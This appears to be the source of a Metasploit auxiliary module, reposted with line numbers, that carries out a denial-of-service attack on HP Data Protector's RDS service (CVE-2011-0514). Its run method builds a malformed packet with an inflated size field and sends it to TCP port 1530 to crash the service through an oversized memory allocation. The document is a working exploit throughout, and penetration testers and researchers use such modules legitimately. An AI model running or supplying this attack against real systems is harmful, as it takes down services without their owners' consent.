Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'        => 'HP Data Protector Manager RDS DOS',
13
      'Description' => %q{
14
          This module causes a remote DOS on HP Data Protector's RDS service.  By sending
15
        a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous
16
        size for malloc().
17
      },
18
      'Author'      =>
19
        [
20
          'Roi Mallo <rmallof[at]gmail.com>',  #initial discovery, poc
21
          'sinn3r',                            #msf
22
        ],
23
      'License'     => MSF_LICENSE,
24
      'References'  =>
25
        [
26
          [ 'CVE', '2011-0514' ],
27
          [ 'OSVDB', '70617' ],
28
          [ 'EDB', '15940' ],
29
        ],
30
      'DisclosureDate' => '2011-01-08' ))
31

32
    register_options([
33
      Opt::RPORT(1530),
34
    ])
35
  end
36

37
  def run
38
    buf  = "\x23\x8c\x29\xb6"  #Header
39
    buf << "\x64\x00\x00\x00"  #Packet size
40
    buf << "\x41"*4            #Data
41

42
    connect
43
    print_status("Sending malformed packet...")
44
    sock.put(buf)
45
    disconnect
46
  end
47
end
48

49